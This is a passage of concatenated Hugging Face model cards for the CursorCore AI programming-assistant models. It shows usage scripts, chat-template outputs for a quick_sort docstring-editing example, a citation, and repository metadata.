4 pivot = arr[len(arr) // 2]
5 left = [x for x in arr if x < pivot]
6 middle = [x for x in arr if x == pivot]
7 right = [x for x in arr if x > pivot]
8 return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>user
Add Docstring.<|im_end|>
<|im_start|>assistant
<|next_start|>1,1
```
'''This function will sort an array using quick sort algorithm'''
```<|next_end|>
To enhance the readability and maintainability of the code, we should add a docstring to the `quick_sort` function. A docstring provides a clear description of what the function does, which is particularly useful for other developers who might use or modify this code in the future.
The docstring will be added immediately after the function definition, explaining that the function uses the quick sort algorithm to sort an array. This will make the code more self-explanatory and easier to understand.
Here's the plan:
1. Add a docstring at the beginning of the `quick_sort` function.
2. Ensure the docstring is clear and concise, describing the purpose of the function.
This modification will improve the code's documentation without altering its functionality.<|im_end|>
````
Script for SR:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_sr
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-1.5B-SR")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-1.5B-SR",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": "Add Docstring."
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_sr(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output for SR:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>current
```python
def quick_sort(array):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>user
Add Docstring.<|im_end|>
<|im_start|>assistant
<|next_start|>```python
def quick_sort(array):
<|search_and_replace|>
def quick_sort(array):
"""
This function implements quick sort algorithm
"""
```<|next_end|><|im_end|>
````
### 3) Web Demo
We have created a web demo for CursorCore. Please visit [CursorWeb](https://github.com/TechxGenus/CursorWeb) for more details.
## Future Work
CursorCore is still in a very early stage, and lots of work is needed to achieve a better user experience. For example:
- Repository-level editing support
- Better and faster editing formats
- Better user interface and presentation
- ...
## Citation
```bibtex
@article{jiang2024cursorcore,
title = {CursorCore: Assist Programming through Aligning Anything},
author = {Hao Jiang and Qi Liu and Rui Li and Shengyu Ye and Shijin Wang},
year = {2024},
journal = {arXiv preprint arXiv: 2410.07002}
}
```
## Contribution
Contributions are welcome! If you find any bugs or have suggestions for improvements, please open an issue or submit a pull request.
|
TechxGenus/CursorCore-DS-1.3B-SR | TechxGenus | 2024-10-10T06:38:31Z | 130 | 0 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"code",
"conversational",
"arxiv:2410.07002",
"base_model:deepseek-ai/deepseek-coder-1.3b-base",
"base_model:finetune:deepseek-ai/deepseek-coder-1.3b-base",
"license:other",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-10-08T04:12:12Z | ---
tags:
- code
base_model:
- deepseek-ai/deepseek-coder-1.3b-base
library_name: transformers
pipeline_tag: text-generation
license: other
license_name: deepseek
license_link: LICENSE
---
# CursorCore: Assist Programming through Aligning Anything
<p align="center">
<a href="http://arxiv.org/abs/2410.07002">[📄arXiv]</a> |
<a href="https://hf.co/papers/2410.07002">[🤗HF Paper]</a> |
<a href="https://huggingface.co/collections/TechxGenus/cursorcore-series-6706618c38598468866b60e2">[🤖Models]</a> |
<a href="https://github.com/TechxGenus/CursorCore">[🛠️Code]</a> |
<a href="https://github.com/TechxGenus/CursorWeb">[Web]</a> |
<a href="https://discord.gg/Z5Tev8fV">[Discord]</a>
</p>
<hr>
- [CursorCore: Assist Programming through Aligning Anything](#cursorcore-assist-programming-through-aligning-anything)
- [Introduction](#introduction)
- [Models](#models)
- [Usage](#usage)
- [1) Normal chat](#1-normal-chat)
- [2) Assistant-Conversation](#2-assistant-conversation)
- [3) Web Demo](#3-web-demo)
- [Future Work](#future-work)
- [Citation](#citation)
- [Contribution](#contribution)
<hr>
## Introduction
CursorCore is a series of open-source models designed for AI-assisted programming. It aims to support features such as automated editing and inline chat, replicating the core abilities of closed-source AI-assisted programming tools like Cursor. This is achieved by aligning data generated through Programming-Instruct. Please read [our paper](http://arxiv.org/abs/2410.07002) to learn more.
<p align="center">
<img width="100%" alt="conversation" src="https://raw.githubusercontent.com/TechxGenus/CursorCore/main/pictures/conversation.png">
</p>

## Models
Our models have been open-sourced on Hugging Face. You can access them here: [CursorCore-Series](https://huggingface.co/collections/TechxGenus/cursorcore-series-6706618c38598468866b60e2). We also provide pre-quantized GPTQ and AWQ weights here: [CursorCore-Quantization](https://huggingface.co/collections/TechxGenus/cursorcore-quantization-67066431f29f252494ee8cf3).
## Usage
Here are some examples of how to use our model:
### 1) Normal chat
Script:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-9B")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-9B",
torch_dtype=torch.bfloat16,
device_map="auto"
)
messages = [
{"role": "user", "content": "Hi!"},
]
prompt = tokenizer.apply_chat_template(
messages,
tokenize=False,
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512)
print(tokenizer.decode(outputs[0]))
````
Output:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>user
Hi!<|im_end|>
<|im_start|>assistant
Hello! I'm an AI language model and I can help you with any programming questions you might have. What specific problem or task are you trying to solve?<|im_end|>
````
### 2) Assistant-Conversation
In our work, we introduce a new framework for AI-assisted programming tasks. It is designed to align anything during the programming process, and it is used to implement features such as Tab and Inline Chat.
Script 1:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_wf
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-9B")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-9B",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [
{
"type": "code",
"lang": "python",
"code": """def quick_sort(arr):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
}
],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": ""
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_wf(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output 1:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>history
```python
def quick_sort(arr):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>current
```python
def quick_sort(array):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>assistant
<|next_start|>```python
def quick_sort(array):
if len(array) <= 1:
return array
pivot = array[len(array) // 2]
left = [x for x in array if x < pivot]
middle = [x for x in array if x == pivot]
right = [x for x in array if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|next_end|>
The user has provided a revised code change that corrects the parameter name from `arr` to `array` in the `quick_sort` function. This change ensures consistency in the function definition and avoids potential confusion or errors.
To implement this, we will:
1. Update the parameter name in the function definition from `arr` to `array`.
2. Ensure that all references to `arr` within the function are updated to `array`.
This will make the function definition and internal references consistent, improving code readability and maintainability.<|im_end|>
````
Script 2:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_wf
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-9B")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-9B",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": "Add Docstring."
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_wf(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output 2:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>current
```python
def quick_sort(array):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>user
Add Docstring.<|im_end|>
<|im_start|>assistant
<|next_start|>```python
def quick_sort(array):
"""
This is an implementation of the quick sort algorithm.
"""
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|next_end|><|im_end|>
````
For models in Locate-and-Change (LC) and Search-and-Replace (SR) formats, the output examples are as follows:
Script for LC:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_lc
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-1.5B-LC")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-1.5B-LC",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": "Add Docstring."
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_lc(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output for LC:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>current
```python
1 def quick_sort(array):
2 if len(arr) <= 1:
3 return arr
4 pivot = arr[len(arr) // 2]
5 left = [x for x in arr if x < pivot]
6 middle = [x for x in arr if x == pivot]
7 right = [x for x in arr if x > pivot]
8 return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>user
Add Docstring.<|im_end|>
<|im_start|>assistant
<|next_start|>1,1
```
'''This function will sort an array using quick sort algorithm'''
```<|next_end|>
To enhance the readability and maintainability of the code, we should add a docstring to the `quick_sort` function. A docstring provides a clear description of what the function does, which is particularly useful for other developers who might use or modify this code in the future.
The docstring will be added immediately after the function definition, explaining that the function uses the quick sort algorithm to sort an array. This will make the code more self-explanatory and easier to understand.
Here's the plan:
1. Add a docstring at the beginning of the `quick_sort` function.
2. Ensure the docstring is clear and concise, describing the purpose of the function.
This modification will improve the code's documentation without altering its functionality.<|im_end|>
````
Script for SR:
````python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
from eval.utils import prepare_input_for_sr
tokenizer = AutoTokenizer.from_pretrained("TechxGenus/CursorCore-Yi-1.5B-SR")
model = AutoModelForCausalLM.from_pretrained(
"TechxGenus/CursorCore-Yi-1.5B-SR",
torch_dtype=torch.bfloat16,
device_map="auto"
)
sample = {
"history": [],
"current": {
"type": "code",
"lang": "python",
"code": """def quick_sort(array):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n return quick_sort(left) + middle + quick_sort(right)"""
},
"user": "Add Docstring."
}
prompt = tokenizer.apply_chat_template(
prepare_input_for_sr(sample),
tokenize=False,
chat_template="assistant-conversation",
add_generation_prompt=True
)
inputs = tokenizer.encode(prompt, return_tensors="pt")
outputs = model.generate(input_ids=inputs.to(model.device), max_new_tokens=512, do_sample=False)
print(tokenizer.decode(outputs[0]))
````
Output for SR:
````txt
<|im_start|>system
You are a helpful programming assistant.<|im_end|>
<|im_start|>current
```python
def quick_sort(array):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quick_sort(left) + middle + quick_sort(right)
```<|im_end|>
<|im_start|>user
Add Docstring.<|im_end|>
<|im_start|>assistant
<|next_start|>```python
def quick_sort(array):
<|search_and_replace|>
def quick_sort(array):
"""
This function implements quick sort algorithm
"""
```<|next_end|><|im_end|>
````
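In the SR format, the assistant's edit between `<|next_start|>` and `<|next_end|>` consists of the text to search for, the `<|search_and_replace|>` marker, and the replacement text. The helper below is only a rough sketch based on our reading of this output format (it is not part of the official evaluation code):
````python
def apply_sr_edit(current_code: str, sr_block: str) -> str:
    """Apply one SR-format edit to the current code.

    `sr_block` is the code block emitted between <|next_start|> and
    <|next_end|>: search text, the <|search_and_replace|> marker,
    then the replacement text.
    """
    search, replacement = sr_block.split("<|search_and_replace|>")
    # Replace only the first occurrence of the searched snippet.
    return current_code.replace(search.strip("\n"), replacement.strip("\n"), 1)
````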
### 3) Web Demo
We have created a web demo for CursorCore. Please visit [CursorWeb](https://github.com/TechxGenus/CursorWeb) for more details.
## Future Work
CursorCore is still in a very early stage, and lots of work is needed to achieve a better user experience. For example:
- Repository-level editing support
- Better and faster editing formats
- Better user interface and presentation
- ...
## Citation
```bibtex
@article{jiang2024cursorcore,
title = {CursorCore: Assist Programming through Aligning Anything},
author = {Hao Jiang and Qi Liu and Rui Li and Shengyu Ye and Shijin Wang},
year = {2024},
journal = {arXiv preprint arXiv: 2410.07002}
}
```
## Contribution
Contributions are welcome! If you find any bugs or have suggestions for improvements, please open an issue or submit a pull request.
|